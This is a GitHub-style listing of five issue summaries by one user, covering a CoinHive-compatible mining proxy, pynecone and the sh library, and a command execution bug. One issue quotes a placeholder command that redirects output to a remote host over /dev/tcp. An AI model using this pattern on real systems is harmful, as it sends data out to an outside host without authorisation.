Paul Bakoyiannis

Results 5 issues of Paul Bakoyiannis

I've noticed that my hash rate is about 25% lower when using this proxy with a pool (supportxmr) versus CoinHive itself. I've tried tweaking the difficulty settings to see if...

Running a basic application for any extended period of time - sometimes just a few minutes - leads to consumers slowly dying one-by-one until they've all stopped responding and the...

bug

I am testing pynecone by making a very basic small tool that wraps a CLI utility. I call `sh.tool(arg, _bg=True, _out=State.update_cmd_stdout)` in my `index` function to use the `sh` library...

The command that was run, with some small changes and placeholders inserted: `execute -o bash -c '[command] > /dev/tcp/[IP]/[PORT]'` The command (`[command]`) completed successfully after ~20 minutes and the output...

bug
investigating
v1.6.x

Keepalive messages from miners were not previously updating the lastContact time on the miner object. This lead to slower miners being pruned after the two minute timeout while they were...